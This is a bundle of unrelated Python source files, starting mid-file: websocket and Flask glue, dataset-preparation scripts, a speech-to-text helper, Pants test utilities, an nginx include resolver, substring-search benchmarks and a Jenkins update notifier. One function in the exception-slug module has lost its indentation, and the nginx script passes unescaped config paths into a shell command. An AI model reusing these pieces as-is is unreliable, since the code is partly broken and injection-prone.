        self.render('index.html')
class BitNowHandler(tornado.websocket.WebSocketHandler):
    """WebSocket handler that, whenever any client sends a message, fetches the
    blockchain.info ticker and broadcasts it to every connected client."""

    clients = []  # all currently-open websocket connections (class-wide registry)
    data = dict()  # last ticker payload; actually replaced by a str in on_message

    def open(self):
        # Log the connection (Chinese: "connection established") and register it.
        print(str(id(self)) + '建立连接')
        BitNowHandler.clients.append(self)

    # NOTE(review): @tornado.web.asynchronous targets RequestHandler, not
    # websocket handlers, and gen.engine is legacy — confirm against the
    # installed Tornado version (modern code uses coroutines / async def).
    @tornado.gen.engine
    @tornado.web.asynchronous
    def on_message(self, message):
        client = httpclient.AsyncHTTPClient()
        response = yield tornado.gen.Task(client.fetch, 'http://blockchain.info/ticker')
        BitNowHandler.data = response.body.decode()  # stores a str despite the dict default
        BitNowHandler.send_to_all(BitNowHandler.data)

    @staticmethod
    def send_to_all(message):
        # Fan the payload out to every open connection.
        for c in BitNowHandler.clients:
            c.write_message(message)

    def on_close(self):
        # Log the disconnect (Chinese: "connection closed") and deregister.
        print(str(id(self)) + '退出连接')
        BitNowHandler.clients.remove(self)
if __name__ == "__main__":
    # Serve the application on port 9999 with the singleton IOLoop.
    server = tornado.httpserver.HTTPServer(Application())
    server.listen(9999)
    tornado.ioloop.IOLoop.instance().start()
|
import demjson
import json
# str = """
# {
# id: 225,
# is_in_serving: true,
# description: "有菜有肉,营养均衡",
# title: "简餐",
# link: "eleme://restaurants?filter_key=%7B%22activity_types%22%3A%5B3%5D%2C%22category_schema%22%3A%7B%22category_name%22%3A%22%5Cu7b80%5Cu9910%22%2C%22complex_category_ids%22%3A%5B209%2C212%2C215%2C265%5D%2C%22is_show_all_category%22%3Atrue%7D%2C%22restaurant_category_id%22%3A%7B%22id%22%3A207%2C%22name%22%3A%22%5Cu5feb%5Cu9910%5Cu4fbf%5Cu5f53%22%2C%22sub_categories%22%3A%5B%5D%2C%22image_url%22%3A%22%22%7D%2C%22activities%22%3A%5B%7B%22id%22%3A3%2C%22name%22%3A%22%5Cu4e0b%5Cu5355%5Cu7acb%5Cu51cf%22%2C%22icon_name%22%3A%22%5Cu51cf%22%2C%22icon_color%22%3A%22f07373%22%2C%22is_need_filling%22%3A1%2C%22is_multi_choice%22%3A0%2C%22filter_value%22%3A3%2C%22filter_key%22%3A%22activity_types%22%7D%5D%7D&target_name=%E7%AE%80%E9%A4%90&animation_type=1&is_need_mark=0&banner_type=",
# image_url: "/d/38/7bddb07503aea4b711236348e2632jpeg.jpeg",
# icon_url: "",
# title_color: ""
# }
# """
#
# # print(demjson.decode(str))
# print(json.dumps(demjson.decode(str)))
if __name__ == '__main__':
    # Decode the lenient JS-style literal file, then re-emit each record
    # as strict JSON, one per line.
    with open("./data.js", "r", encoding="utf8") as f:
        records = demjson.decode(f.read())
    for record in records:
        print(json.dumps(record))
|
# -*- coding: utf-8 -*-
import glob, os
import sys
import shutil
# Script: split a folder of .jpg images into darknet train.txt/test.txt lists,
# then move the test images into <image folder>/test.
# Get the folder name from argument 1.
args = sys.argv
if (len(args) != 3):
    # NOTE(review): missing space after "python" in the usage string.
    print("Usage: $ python" + args[0] + " <image folder> <ratio of test(%)>")
    quit()
path_data = args[1]
percentage_test = int(args[2])
print("Folder name is '%s'. ratio of test is %d%%." % (path_data, percentage_test))
# Current directory
current_dir = os.path.dirname(os.path.abspath(__file__))
# Directory where the data will reside, relative to 'darknet.exe'
# path_data = 'data/all2/'
# Percentage of images to be used for the test set
# percentage_test = 10;
# Create and/or truncate train.txt and test.txt
file_train = open('train.txt', 'w')
file_test = open('test.txt', 'w')
# Populate train.txt and test.txt
counter = 1
# Every index_test-th image goes to the test set.
# NOTE(review): percentage_test == 0 raises ZeroDivisionError here.
index_test = round(100 / percentage_test)
# for pathAndFilename in glob.iglob(os.path.join(current_dir, "*.jpg")):
for pathAndFilename in glob.iglob(os.path.join(path_data, "*.jpg")):
    title, ext = os.path.splitext(os.path.basename(pathAndFilename))
    # print("title is %s. ext is %s." % (title, ext))
    if counter == index_test:
        counter = 1
        file_test.write(path_data + '/' + title + '.jpg' + '\n')
    else:
        file_train.write(path_data + '/' + title + '.jpg' + '\n')
        counter = counter + 1
file_train.close() # must close before reopening below
file_test.close() # must close before reopening below
print("(1/2) Done!")
# Move the test files into their own subdirectory.
dst_dir = path_data + '/test'
print("dst_dir: '%s'" % dst_dir)
if not os.path.exists(dst_dir) :
    os.makedirs(dst_dir)
# Read test.txt back line by line.
file_name = 'test.txt'
print("file_name is '%s'" % file_name)
'''
if not os.path.exists(file_name) :
    print("not exit")
else:
    print("exist")
'''
with open(file_name) as f:
    print("open file")
    '''
    while True:
        s_line = f.readline()
        print(s_line)
        if not s_line:
            break
    '''
    for line in f:
        print("line: %s" % line)
        print("画像を %s/test へ移動します" % path_data)
        # Split the path into base name and extension (trailing newline ends
        # up in the extension, so name_base stays clean).
        name_base, name_ext = os.path.splitext(line)
        print("name_base is '%s'" % name_base)
        base_name = os.path.splitext(os.path.basename(line))[0]
        print(" base_name: %s" % base_name)
        from_file_jpg = name_base + '.jpg'
        # from_file_txt = name_base + '.txt'
        print("from_file_jpg is '%s'" % from_file_jpg)
        to_file_jpg = dst_dir + '/' + base_name + '.jpg'
        # to_file_txt = dst_dir + '/' + base_name + '.txt'
        print("to_file_jpg is '%s'" % to_file_jpg)
        shutil.move(from_file_jpg, to_file_jpg)
        # shutil.move(from_file_txt, to_file_txt)
print("(2/2) Done!")
|
import os
import pathlib
import sys

import azure.functions as func

# Make the bundled Flask app importable BEFORE importing it. The original
# executed `from secureFlaskApp import app` at the very top, before this
# sys.path manipulation, so the import could only succeed by accident.
root_function_dir = pathlib.Path(__file__).parent.parent
secureFlaskApp_path = os.path.join(root_function_dir, "secureFlaskApp")
sys.path.insert(0, secureFlaskApp_path)

from secureFlaskApp import app as application


def main(req: func.HttpRequest, context: func.Context) -> func.HttpResponse:
    """Azure Functions entry point: bridge the HTTP trigger to the Flask WSGI app."""
    return func.WsgiMiddleware(application).handle(req, context)
|
import pandas as pd
import numpy as np
from PIL import Image
import skimage
import imageio
import os
import glob
import warnings
import natsort
warnings.filterwarnings('ignore')
def findFiles(path):
    """Return the files matching the glob *path*, in natural sort order."""
    matches = glob.glob(path)
    return natsort.natsorted(matches)
# Each "<class>_test_split1.txt" file lists the videos of one action class.
testlist = findFiles('three splits/split1/*.txt')
trainsample = []
trainlabel = []
# NOTE(review): testsample/testlabel are never populated, so the second
# extraction loop below is a no-op — presumably the split flag column in the
# list files should route entries between train and test. Confirm intent.
testsample = []
testlabel = []
categories = []
for i in range(len(testlist)):
    # The class name is everything before "_test_" in the file name.
    filename = testlist[i].split('/')[-1].split('_test_')[0]
    categories.append(filename)
    listall = pd.read_table(testlist[i], header=None, delim_whitespace=True)
    for j in range(len(listall)):
        # Fix: `.ix` was removed from pandas; `.iloc` is the positional equivalent.
        trainsample.append(listall.iloc[j, 0])
        trainlabel.append(filename)
# Decode every training video into per-frame JPEGs under HMDB/<class>/<video>/.
for idx in range(len(trainlabel)):
    video_dir = os.path.join('HMDB-51', trainlabel[idx], trainsample[idx])
    video = imageio.get_reader(video_dir, 'ffmpeg')
    print('the training number is: ', idx)
    sample = trainsample[idx].split('.')[0]
    sample_dir = os.path.join('HMDB', trainlabel[idx], sample)
    os.makedirs(sample_dir)
    for num, img in enumerate(video):
        image = skimage.img_as_float(img).astype(np.float32)
        image = Image.fromarray(np.uint8(image * 255))
        image.save(sample_dir + '/' + str(num) + '.jpg')
    # Stop and report the first video that produced no frames at all.
    if len(findFiles(sample_dir + '/*.jpg')) == 0:
        print(sample_dir)
        break
# Same extraction for the test videos (currently empty — see note above).
for idx in range(len(testlabel)):
    video_dir = os.path.join('HMDB-51', testlabel[idx], testsample[idx])
    video = imageio.get_reader(video_dir, 'ffmpeg')
    print('the testing number is: ', idx)
    sample = testsample[idx].split('.')[0]
    sample_dir = os.path.join('HMDB', testlabel[idx], sample)
    os.makedirs(sample_dir)
    for num, img in enumerate(video):
        image = skimage.img_as_float(img).astype(np.float32)
        image = Image.fromarray(np.uint8(image * 255))
        image.save(sample_dir + '/' + str(num) + '.jpg')
    if len(findFiles(sample_dir + '/*.jpg')) == 0:
        print(sample_dir)
        break
|
import requests
import uuid
from bs4 import BeautifulSoup
from config import YANDEX_TRANS_KEY
def update2text(update, locale):  # locale="ru-RU" or "en-US"
    """Extract text from a Telegram update: the message text and/or the
    speech-to-text transcription of an attached voice note.

    Returns the text, or None when nothing usable was found.
    """
    message = update.message
    text = ""
    if message.text:
        text = message.text  # if the message carries text, start with that
    if message.voice:  # if there is a voice note, try to recognise it
        file_info = message.bot.get_file(message.voice.file_id)
        file = requests.get(file_info.file_path)  # this is how files are downloaded from Telegram
        uu_id = str(uuid.uuid4()).replace("-", "")
        answer = speech_2_text(file.content, uu_id, locale)  # attempt recognition
        if len(answer) != 0:
            mv = max(answer, key=answer.get)  # take the best-scoring variant
            text = mv
    if len(text) == 0:
        text = None  # no text in the message and recognition failed
    return text
def speech_2_text(data, uid, lang):
    """Send raw OGG/Opus audio to the Yandex ASR HTTP API.

    Returns a dict mapping each recognised variant string to its confidence.
    """
    base = "https://asr.yandex.net/asr_xml?uuid={}&key={}&topic={}&lang={}&disableAntimat={}"
    request_url = base.format(uid, YANDEX_TRANS_KEY, "queries", lang, "true")
    headers = {'Content-Type': 'audio/ogg;codecs=opus', 'Content-Length': str(len(data))}
    resp = requests.post(request_url, data=data, headers=headers)
    dom = BeautifulSoup(resp.text, "lxml")
    variants = dom.html.body.recognitionresults.findAll("variant")
    return {var.string: float(var['confidence']) for var in variants}
|
import logging
from typing import Sequence
logger = logging.getLogger(__name__)
def gather_exception_subclasses(module, parent_classes: Sequence):
    """
    Browse the module's variables, and return all found exception classes
    which are subclasses of `parent_classes` (including these, if found in module).

    :param module: python module object
    :param parent_classes: list of exception classes (or single exception class)
    :return: list of exception subclasses
    """
    if isinstance(parent_classes, type):
        # The docstring allows passing a single class, but tuple() on a
        # non-iterable class raised TypeError — wrap it first.
        parent_classes = (parent_classes,)
    parent_classes = tuple(parent_classes)
    return [
        value
        for value in vars(module).values()
        # issubclass() requires a class; includes the parent classes themselves.
        if isinstance(value, type) and issubclass(value, parent_classes)
    ]
def _fully_qualified_name(o):
"""Return the fully qualified dotted name of an object, as a string."""
module = o.__module__
if module is None or module == str.__module__:
return o.__name__ # Avoid reporting __builtin__
else:
return module + "." + o.__name__
#: These ancestor classes are too generic to be included in status slugs
DEFAULT_EXCLUDED_EXCEPTION_CLASSES = (object, BaseException, Exception)
def slugify_exception_class(
    exception_class, excluded_classes=DEFAULT_EXCLUDED_EXCEPTION_CLASSES, qualified_name_extractor=_fully_qualified_name
):
    """
    Turn an exception class into a list of slugs which identifies it uniquely,
    from ancestor to descendant.

    :param exception_class: exception class to slugify
    :param excluded_classes: list of parents classes so generic that they needn't be included in slugs
    :param qualified_name_extractor: callable which turns an exception class into its qualified name
    :return: list of strings
    """
    # TODO change casing for class name? Inspect exception_class.slug_name if present?
    assert isinstance(exception_class, type), exception_class  # Must be a CLASS, not an instance!
    slugs = []
    # Walk the MRO from the most generic ancestor down to the class itself.
    for ancestor in reversed(exception_class.__mro__):
        if ancestor in excluded_classes:
            continue
        slugs.append(qualified_name_extractor(ancestor))
    return slugs
def construct_status_slugs_mapper(
    exception_classes, fallback_exception_class, exception_slugifier=slugify_exception_class
):
    """
    Construct and return a tree where branches are qualified slugs, and each leaf is an exception
    class corresponding to the path leading to it.

    Intermediate branches can carry an (ancestor) exception class too, but only if this one is explicitely
    included in `exception_classes`.

    The fallback exception class is stored at the root of the tree under the "" key.
    """
    tree = {"": fallback_exception_class}  # Special value at root
    for klass in exception_classes:
        slugs = exception_slugifier(klass)
        if not slugs:
            # E.g. BaseException and the likes, shadowed by fallback_exception_class.
            continue
        node = tree
        for slug in slugs:
            # Descend, creating branches on demand (never for mere ancestors).
            node = node.setdefault(slug, {})
        node[""] = klass
    return tree
def get_closest_exception_class_for_status_slugs(slugs, mapper_tree):
    """
    Return the exception class targeted by the provided status slugs,
    or the closest ancestor class if the exact exception class is not in the mapper.

    If `slugs` is empty, or if no ancestor is found, the fallback exception of the mapper is returned instead.

    :param slugs: qualified status slugs
    :param mapper_tree: mapper tree constructed from selected exceptions
    :return: exception class object
    """
    node = mapper_tree
    best_match = mapper_tree[""]  # ultimate root fallback
    for slug in slugs:
        child = node.get(slug)
        if child is None:
            # Unknown branch: fall back to the closest known ancestor.
            return best_match
        best_match = child.get("", best_match)
        node = child
    return node.get("", best_match)
class StatusSlugsMapper:
    """
    High-level wrapper for converting exceptions from/to status slugs.
    """

    def __init__(self, exception_classes, fallback_exception_class, exception_slugifier=slugify_exception_class):
        # Keep the slugifier so slugify_exception_class() below can delegate to it.
        self._slugify_exception_class = exception_slugifier
        self._mapper_tree = construct_status_slugs_mapper(
            exception_classes, fallback_exception_class, exception_slugifier
        )

    def slugify_exception_class(self, exception_class, *args, **kwargs):
        """Use the exception slugifier provided in `__init__()` to turn an exception class into a qualified name."""
        return self._slugify_exception_class(exception_class, *args, **kwargs)

    def get_closest_exception_class_for_status_slugs(self, slugs):
        """Return the closest exception class targeted by the provided status slugs,
        with a fallback class if no matching ancestor is found at all."""
        return get_closest_exception_class_for_status_slugs(slugs, mapper_tree=self._mapper_tree)

    # Re-exported as a static helper for convenience.
    gather_exception_subclasses = staticmethod(gather_exception_subclasses)
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import functools
import os
from contextlib import contextmanager
from dataclasses import dataclass
from threading import Thread
from typing import Any, BinaryIO, Dict, Iterable, Tuple
from pylsp_jsonrpc.endpoint import Endpoint # type: ignore[import]
from pylsp_jsonrpc.streams import JsonRpcStreamReader, JsonRpcStreamWriter # type: ignore[import]
from pants.bsp.context import BSPContext
from pants.bsp.protocol import BSPConnection
from pants.bsp.rules import rules as bsp_rules
from pants.engine.internals.native_engine import PyThreadLocals
from pants.testutil.rule_runner import RuleRunner
@dataclass(frozen=True)
class PipesForTest:
    """The four ends of the two OS pipes connecting a test BSP client to the server.

    Data written to `client_writer` appears on `server_reader`; data written
    to `server_writer` appears on `client_reader`.
    """

    server_reader: BinaryIO
    server_writer: BinaryIO
    client_writer: BinaryIO
    client_reader: BinaryIO
@contextmanager
def setup_pipes():
    """Yield a PipesForTest with two OS pipes wrapped as unbuffered binary
    file objects; all four ends are closed on exit."""
    # Pipe 1: the server reads what the client writes.
    read_fd, write_fd = os.pipe()
    server_reader = os.fdopen(read_fd, "rb", buffering=0)
    client_writer = os.fdopen(write_fd, "wb", buffering=0)
    # Pipe 2: the client reads what the server writes.
    read_fd, write_fd = os.pipe()
    client_reader = os.fdopen(read_fd, "rb", buffering=0)
    server_writer = os.fdopen(write_fd, "wb", buffering=0)
    pipes = PipesForTest(
        server_reader=server_reader,
        server_writer=server_writer,
        client_writer=client_writer,
        client_reader=client_reader,
    )
    try:
        yield pipes
    finally:
        for handle in (server_reader, server_writer, client_writer, client_reader):
            handle.close()
# A notification method name, and a subset of its fields.
NotificationSubset = Tuple[str, Dict[str, Any]]
@dataclass
class Notifications:
    # Buffered (method_name, params) pairs received from the server.
    _notifications: list[tuple[str, dict[str, Any]]]

    def _record(self, method_name: str, notification: dict[str, Any]) -> None:
        """Buffer one received notification."""
        self._notifications.append((method_name, notification))

    def assert_received_unordered(self, expected: Iterable[NotificationSubset]) -> None:
        """Asserts that the buffer contains matching notifications, then clears the buffer."""
        remaining = list(expected)
        for method_name, payload in self._notifications:
            match_index = None
            for idx, (wanted_method, wanted_subset) in enumerate(remaining):
                # A candidate matches when its method name agrees and its
                # fields are a subset of the notification's fields.
                if wanted_method == method_name and wanted_subset.items() <= payload.items():
                    match_index = idx
                    break
            if match_index is None:
                raise AssertionError(
                    f"Received unexpected `{method_name}` notification: {payload}"
                )
            remaining.pop(match_index)
        if remaining:
            raise AssertionError(f"Did not receive all expected notifications: {remaining}")
        self._notifications.clear()
@contextmanager
def setup_bsp_server(
    rule_runner: RuleRunner | None = None, *, notification_names: set[str] | None = None
):
    """Run a BSP server and a JSON-RPC client over in-process pipes.

    Yields (endpoint, notifications): the client-side Endpoint for issuing
    requests, and a Notifications buffer that records server notifications
    whose method names appear in `notification_names`.
    """
    rule_runner = rule_runner or RuleRunner(rules=bsp_rules())
    notification_names = notification_names or set()
    # Capture engine thread-locals so the server thread can adopt them.
    thread_locals = PyThreadLocals.get_for_current_thread()
    with setup_pipes() as pipes:
        context = BSPContext()
        rule_runner.set_session_values({BSPContext: context})
        conn = BSPConnection(
            rule_runner.scheduler,
            rule_runner.union_membership,
            context,
            pipes.server_reader,
            pipes.server_writer,
        )
        def run_bsp_server():
            thread_locals.set_for_current_thread()
            conn.run()
        # Daemon threads so a failing test doesn't hang on interpreter exit.
        bsp_thread = Thread(target=run_bsp_server)
        bsp_thread.daemon = True
        bsp_thread.start()
        client_reader = JsonRpcStreamReader(pipes.client_reader)
        client_writer = JsonRpcStreamWriter(pipes.client_writer)
        notifications = Notifications([])
        # Route each subscribed notification name into the buffer.
        endpoint = Endpoint(
            {name: functools.partial(notifications._record, name) for name in notification_names},
            lambda msg: client_writer.write(msg),
        )
        def run_client():
            client_reader.listen(lambda msg: endpoint.consume(msg))
        client_thread = Thread(target=run_client)
        client_thread.daemon = True
        client_thread.start()
        try:
            yield endpoint, notifications
        finally:
            client_reader.close()
            client_writer.close()
|
import os
import re
import sys
# CLI: argv[1] = path to the main nginx.conf, argv[2] = output path prefix.
nginxConfPath = sys.argv[1]
confPathList_file = sys.argv[2]
nginxfile = nginxConfPath
# All resolved include paths are appended to this file.
file_tmp = confPathList_file + 'confPathList.txt'
def getConfPath(confFile, confFile_tmp):
    """Recursively resolve nginx `include` directives starting at *confFile*,
    writing every discovered config path to the open file *confFile_tmp*.

    Fixes: regexes are raw strings (previously invalid-escape warnings), each
    pattern is matched once instead of twice per line, and the config file is
    closed via a context manager.
    """
    if not os.path.isfile(confFile):
        return
    with open(confFile) as fo:
        readlines = fo.readlines()
    for strline in readlines:
        # Skip comment lines.
        if re.match(r'\s*#.*', strline) is not None:
            continue
        includePath = None
        # Quoting variants, checked in the original order:
        # include '...'; then include "..."; then bare include ...;
        for pattern in (r"\s*include\s+'\s*(.*)\s*'\s*;",
                        r'\s*include\s+"\s*(.*)\s*"\s*;',
                        r'\s*include\s+(.*)\s*;'):
            includeMatch = re.match(pattern, strline)
            if includeMatch is not None:
                includePath = includeMatch.group(1).strip()
                break
        if includePath is None:
            continue
        if not includePath.startswith('/'):
            # Resolve relative includes against the main config's directory.
            includePath = nginxfile.rpartition('/')[0] + '/' + includePath
        # Expand globs via find(1) and recurse into every matched file.
        searchFileList = searchFile(includePath)
        for search_read in searchFileList.readlines():
            confFile_tmp.write(search_read.strip() + '\n')
            getConfPath(search_read.strip(), confFile_tmp)
def searchFile(path):
    """Expand a (possibly glob-style) path via find(1); returns the pipe handle."""
    # nginx globs use '*'; find -regex wants an egrep pattern.
    pattern = path.replace('*', '.*')
    cmd = "find / -regextype 'posix-egrep' -regex " + "'" + pattern + "'"
    return os.popen(cmd)
# Entry point: walk the main config and record every resolved include path.
if os.path.isfile(nginxfile):
    fo_tmp = open(file_tmp, 'w+')
    getConfPath(nginxfile, fo_tmp)
    fo_tmp.close()
|
# Generated by Django 2.1.2 on 2019-02-15 16:44
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
    """Adds Type.step_for_min_quantity and tightens validators/help text on
    Type.min_quantity.

    NOTE: auto-generated by Django 2.1.2 — do not hand-edit applied migrations.
    """

    dependencies = [
        ('products', '0040_auto_20190215_1449'),
    ]

    operations = [
        migrations.AddField(
            model_name='type',
            name='step_for_min_quantity',
            field=models.FloatField(blank=True, default=0.1, help_text='Рекомендації: 0.1 для вагових продуктів та 1 для продуктів, що продаються поштучно. Значення по замовчуванню (якщо не вказати): 0.1', null=True, verbose_name='Крок збільшення/зменшення для кількості'),
        ),
        migrations.AlterField(
            model_name='type',
            name='min_quantity',
            field=models.IntegerField(blank=True, default=1, help_text='Мінімальна кількість шт чи кг, яку можна замовити. Вказується для типу продуктів в цілому. Значення по замовчуванню(якщо не вказати): 1', null=True, validators=[django.core.validators.MaxValueValidator(999), django.core.validators.MinValueValidator(1)], verbose_name='Мінімально можлива кількість до замовлення:'),
        ),
    ]
|
import time
import string
import random
# import math
import seaborn as sns
import matplotlib.pyplot as plt
import pandas as pd
# defines the number of times each algorithm will be processed to obtain the
# average time
num_rounds = 20
# Fraction of the text length used as the searched pattern (see avgTime).
SEQUENCE_LENGTH = 0.1
# Cross-algorithm cache: (size, round) -> (found, text, pattern); used to
# verify that all algorithms agree on identical inputs.
DR = dict()
def Naive(T, S):
    """Naive substring search: return True iff S occurs in T.

    Tries every alignment of S against T; when the remaining text is exactly
    as long as the pattern, a single comparison decides the result.

    Cleanup: the original kept a counter `j` that was written but never read;
    it is removed. Behaviour is unchanged.
    """
    for i in range(len(T)):
        if len(T) - i == len(S):
            return T[i:] == S
        if T[i:i + len(S)] == S:
            return True
    return False
def create_kmp_table(S):
    """Build the KMP failure table for pattern S.

    table[j] is the length of the longest proper prefix of S[:j+1] that is
    also a suffix of it.
    """
    table = [0] * len(S)
    prefix_len = 0
    pos = 1
    while pos < len(S):
        if S[prefix_len] == S[pos]:
            # Extend the current prefix match.
            prefix_len += 1
            table[pos] = prefix_len
            pos += 1
        elif prefix_len == 0:
            table[pos] = 0
            pos += 1
        else:
            # Fall back to the next-shorter candidate prefix.
            prefix_len = table[prefix_len - 1]
    return table
def KMP(T, S):
    """Knuth-Morris-Pratt substring search: return True iff S occurs in T."""
    if len(S) > len(T):
        return False
    failure = create_kmp_table(S)
    matched = 0  # number of pattern characters currently matched
    for ch in T:
        # On mismatch, shrink to the longest border that still matches.
        while matched > 0 and ch != S[matched]:
            matched = failure[matched - 1]
        if ch == S[matched]:
            if matched == len(S) - 1:
                return True
            matched += 1
    return False
def BMH(T, S):
    """Boyer-Moore-Horspool substring search: return True iff S occurs in T."""
    if len(S) > len(T):
        return False
    # Bad-character shift table built from the pattern.
    shift = {}
    for idx in range(len(S)):
        if idx < len(S) - 1:
            shift[S[idx]] = len(S) - idx - 1
        elif S[idx] not in shift:
            # The final character only gets a full-length shift if unseen before.
            shift[S[idx]] = len(S)
    pos = len(S) - 1
    while pos < len(T):
        # Cheap last-character test before the full window comparison.
        if T[pos] == S[-1] and T[pos - len(S) + 1:pos + 1] == S:
            return True
        pos += shift.get(T[pos], len(S))
    return False
def BMH_2(text, pattern):
    """Boyer-Moore-Horspool search (byte-indexed table): True iff pattern occurs in text.

    Fix: the over-long-pattern guard used to return -1 — a *truthy* int —
    while every other path (and every sibling search function in this module)
    returns a bool; it now returns False.
    """
    m = len(pattern)
    n = len(text)
    if m > n:
        return False
    # Bad-character shift table indexed by ord(char); default shift is m.
    skip = [m] * 256
    for k in range(m - 1):
        skip[ord(pattern[k])] = m - k - 1
    skip = tuple(skip)
    k = m - 1
    while k < n:
        # Compare the pattern right-to-left against the window ending at k.
        j = m - 1
        i = k
        while j >= 0 and text[i] == pattern[j]:
            j -= 1
            i -= 1
        if j == -1:
            return True
        k += skip[ord(text[k])]
    return False
def plot(data):
    """Render average runtime per input size as one line per algorithm.

    Keys of *data* look like "Algorithm##Size" and map to the average time.
    """
    frame = pd.DataFrame.from_dict(data, orient='index', columns=['Time'])
    # Split the "Algorithm##Size" index keys back into separate columns.
    names, sizes = [], []
    for key in frame.index:
        algorithm, size = key.split("##")
        names.append(algorithm)
        sizes.append(int(size))
    frame['Algorithm'] = names
    frame['Size'] = sizes
    # Defines font size and line width
    sns.set(font_scale=1, style="ticks", rc={"lines.linewidth": 2})
    # Defines plot size
    plt.rcParams['figure.figsize'] = [20, 10]
    chart = sns.lineplot(x='Size', y='Time', hue='Algorithm', data=frame)
    chart.set(xticks=[s for s in frame.Size])
    plt.show()
# calculates the executions average time
# calculates the executions average time
def avgTime(func, size, debug=True):
    """Average wall-clock time of `func(T, S)` over `num_rounds` seeded runs.

    T is a random text of `size` letters; S is a slice of T of roughly
    SEQUENCE_LENGTH * size characters, so a match normally exists.
    When `debug` is set, results are cross-checked between algorithms via
    the module-level DR cache.
    """
    t = 0
    for i in range(num_rounds):
        # Seed per (size, round) so every algorithm sees identical inputs.
        random.seed(size + i)
        T = "".join([random.choice(string.ascii_letters) for i in range(size)])
        # NOTE(review): `start`/`end` are reused below for timing — the slice
        # bounds and the timestamps share names. Works, but confusing.
        start = random.randint(1, size)
        end = min(start + int(size * SEQUENCE_LENGTH + 1), size)
        S = T[start:end]
        start = time.time()
        p = func(T, S)
        end = time.time()
        t += end - start
        if debug:
            # add the result or check if it is the same
            if (size, i) not in DR:
                DR[(size, i)] = (p, T, S)
            else:
                (sp, sT, sS) = DR[(size, i)]
                if p != sp:
                    print(f"1. S={DR[(size, i)][2]}, found={DR[(size, i)][0]} \
                and T={DR[(size, i)][1]}")
                    print(f"2. S={S}, found={p} and T={T} ")
                    assert p == sp
    return t / num_rounds
def run():
    """Benchmark each search algorithm over several input sizes, then plot.

    Fix: the `algorithms` list was assigned twice on consecutive identical
    lines; the duplicate is removed.
    """
    # defines the algorithms to be processed
    algorithms = [Naive, KMP, BMH]
    sizes = [10000, 20000, 30000, 40000, 50000]
    mapSizeToTime = dict()
    for i in range(len(sizes)):
        print(f"Starting collect {i + 1}")
        # map list size to algorithm average time
        for algorithm in algorithms:
            print(' > ', algorithm.__name__)
            mapSizeToTime[f"{algorithm.__name__}##{sizes[i]}"] = \
                avgTime(algorithm, sizes[i], True)
    print("Finish data collection")
    plot(mapSizeToTime)
# Script entry point: run the full benchmark suite.
if __name__ == "__main__":
    run()
|
import json
import os
import re
import smtplib
import sys
from email.mime.text import MIMEText
import backoff
import requests
# get variables from environment (all have sensible defaults for local use)
CHECK_JENKINS_UPDATES_SOURCE = os.getenv(
    'CHECK_JENKINS_UPDATES_SOURCE',
    'http://updates.jenkins-ci.org/stable/update-center.json')
# SMTP relay used to send the notification email
CHECK_JENKINS_UPDATES_SMTP = os.getenv(
    'CHECK_JENKINS_UPDATES_SMTP',
    'localhost')
# From address of the notification email
CHECK_JENKINS_UPDATES_FROM = os.getenv(
    'CHECK_JENKINS_UPDATES_FROM',
    'check-jenkins-updates@unknown')
# Comma-separated recipient list
CHECK_JENKINS_UPDATES_RECIPIENT = os.getenv(
    'CHECK_JENKINS_UPDATES_RECIPIENT',
    'root@localhost').split(',')
# Cache file remembering the last Jenkins version seen
CHECK_JENKINS_UPDATES_CACHE = os.getenv(
    'CHECK_JENKINS_UPDATES_CACHE',
    '/tmp/check_jenkins_version.cache')
# Max seconds to keep retrying the HTTP fetch (see get_current_versions)
CHECK_JENKINS_UPDATES_RETRY_TIMEOUT = int(os.getenv(
    'CHECK_JENKINS_UPDATES_RETRY_TIMEOUT',
    '120'))
# Verbose progress output when CHECK_JENKINS_UPDATES_DEBUG=1.
# (Replaces a four-line if/else that assigned a boolean.)
DEBUG = os.getenv('CHECK_JENKINS_UPDATES_DEBUG', '0') == '1'
def main():
    """Compare the cached Jenkins version with the latest stable release and
    email a notification when a new release is available."""
    # load previous check results from cache
    if os.path.isfile(CHECK_JENKINS_UPDATES_CACHE):
        if DEBUG: print('found cache file')
        with open(CHECK_JENKINS_UPDATES_CACHE, 'r') as f:
            try:
                previous_check = json.load(f)
                cache_file_loaded = True
            except ValueError:
                if DEBUG: print('cache file does not contain valid JSON, '
                                'forcing update check')
                cache_file_loaded = False
    else:
        if DEBUG: print('no cache file found, forcing update check')
        cache_file_loaded = False
    # Fall back to an empty record so the version comparison below fires.
    # NOTE(review): `== False` would be cleaner as `not cache_file_loaded`.
    if cache_file_loaded == False:
        previous_check = {
            'url': '',
            'sha1': '',
            'buildDate': '',
            'version': '',
            'name': ''
        }
    # get current version details from update source
    r = get_current_versions(CHECK_JENKINS_UPDATES_SOURCE)
    try:
        # The update-center payload is JSONP; the JSON sits on its own line.
        raw_json = re.search('\n(.*?)\n', r.text).group(1)
    except AttributeError:
        print('error: could not parse JSON from remote update source')
        sys.exit(1)
    current_json = json.loads(raw_json)
    # save current version to cache
    with open(CHECK_JENKINS_UPDATES_CACHE, 'w') as f:
        json.dump(current_json['core'], f)
    # check for version change
    if previous_check['version'] != current_json['core']['version']:
        output = (f"version change detected: {previous_check['version']} -> "
                  f"{current_json['core']['version']}")
        subject = ("new Jenkins release is available: "
                   f"{current_json['core']['version']}")
        if DEBUG: print(output)
        send_email(subject, output)
        if DEBUG: print('email sent!')
    else:
        if DEBUG: print(f"latest version has not changed (is: "
                        f"{current_json['core']['version']})")
@backoff.on_exception(backoff.expo,
                      requests.exceptions.ConnectionError,
                      max_time=CHECK_JENKINS_UPDATES_RETRY_TIMEOUT)
def get_current_versions(url):
    """Fetch the update-center payload, retrying connection errors with
    exponential backoff.

    Fix: the `url` parameter was ignored in favour of the module-level
    constant; the sole caller passes that same constant, so honouring the
    parameter is behaviour-compatible.
    """
    return requests.get(url)
def send_email(msg_subject, msg_text):
    """Send *msg_text* as a plain-text email through the configured SMTP relay."""
    message = MIMEText(msg_text)
    message['Subject'] = msg_subject
    message['From'] = CHECK_JENKINS_UPDATES_FROM
    message['To'] = ','.join(CHECK_JENKINS_UPDATES_RECIPIENT)
    if DEBUG: print(f"sending email via mailserver "
                    f"{CHECK_JENKINS_UPDATES_SMTP}")
    smtp = smtplib.SMTP(CHECK_JENKINS_UPDATES_SMTP)
    smtp.sendmail(CHECK_JENKINS_UPDATES_FROM, CHECK_JENKINS_UPDATES_RECIPIENT,
                  message.as_string())
    smtp.quit()
# Script entry point.
